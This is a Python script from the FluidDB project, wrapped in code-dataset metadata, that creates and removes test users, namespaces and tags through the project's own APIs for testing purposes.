35489b42960c3642fb09f7d87e33db297be3e58b | 2,651 | py | Python | fluiddb/scripts/testing.py | fluidinfo/fluiddb | b5a8c8349f3eaf3364cc4efba4736c3e33b30d96 | [
"Apache-2.0"
] | 3 | 2021-05-10T14:41:30.000Z | 2021-12-16T05:53:30.000Z | fluiddb/scripts/testing.py | fluidinfo/fluiddb | b5a8c8349f3eaf3364cc4efba4736c3e33b30d96 | [
"Apache-2.0"
] | null | null | null | fluiddb/scripts/testing.py | fluidinfo/fluiddb | b5a8c8349f3eaf3364cc4efba4736c3e33b30d96 | [
"Apache-2.0"
] | 2 | 2018-01-24T09:03:21.000Z | 2021-06-25T08:34:54.000Z | import logging
from fluiddb.data.store import getMainStore
from fluiddb.exceptions import FeatureError
from fluiddb.model.namespace import NamespaceAPI
from fluiddb.model.tag import TagAPI
from fluiddb.model.user import UserAPI, getUser
TESTING_DATA = {
u'users': [
u'testuser1',
u'testuser2'],
u'namespaces': [
u'fluiddb/testing',
u'fluiddb/testing/testing',
u'testuser1/testing',
u'testuser1/testing/testing',
u'testuser2/testing',
u'testuser2/testing/testing'],
u'tags': [
u'fluiddb/testing/test1',
u'fluiddb/testing/test2',
u'testuser1/testing/test1',
u'testuser1/testing/test2',
u'testuser2/testing/test1',
u'testuser2/testing/test2']
}
def prepareForTesting():
"""
Create a set of L{User}s, L{Namespace}s and L{Tag}s for testing purposes.
"""
admin = getUser(u'fluiddb')
logging.info('Creating testing users.')
UserAPI().create([(username, 'secret', u'Test user', u'test@example.com')
for username in TESTING_DATA[u'users']])
logging.info('Creating testing namespaces.')
NamespaceAPI(admin).create([(namespace, u'Used for testing purposes.')
for namespace in TESTING_DATA[u'namespaces']])
logging.info('Creating testing tags.')
TagAPI(admin).create([(tag, u'Used for testing purposes.')
for tag in TESTING_DATA[u'tags']])
getMainStore().commit()
def removeTestingData():
"""
Delete L{User}s, L{Namespace}s and L{Tag}s used for testing purposes.
"""
admin = getUser(u'fluiddb')
logging.info('Deleting testing tags.')
result = TagAPI(admin).get(TESTING_DATA[u'tags'])
if result:
TagAPI(admin).delete(result.keys())
logging.info('Deleting testing namespaces.')
result = NamespaceAPI(admin).get(TESTING_DATA[u'namespaces'])
# we must delete namespaces one by one, otherwise we'll get NotEmptyError.
for path in sorted(result.keys(), reverse=True):
NamespaceAPI(admin).delete([path])
logging.info('Deleting testing users.')
result = UserAPI().get(TESTING_DATA[u'users'])
if result:
for username in result:
path = '%s/private' % username
try:
NamespaceAPI(admin).delete([path])
except FeatureError:
# FIXME This is a bit crap, but it's faster than checking to
# see if the namespace exists before attempting to delete it.
continue
if result:
UserAPI().delete(result.keys())
getMainStore().commit()
| 33.987179 | 78 | 0.629951 | 318 | 2,651 | 5.22956 | 0.27044 | 0.046302 | 0.050511 | 0.030667 | 0.144318 | 0.120265 | 0.088996 | 0.088996 | 0.088996 | 0.030066 | 0 | 0.008012 | 0.246699 | 2,651 | 77 | 79 | 34.428571 | 0.824737 | 0.126745 | 0 | 0.152542 | 0 | 0 | 0.255916 | 0.09071 | 0 | 0 | 0 | 0.012987 | 0 | 1 | 0.033898 | false | 0 | 0.101695 | 0 | 0.135593 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.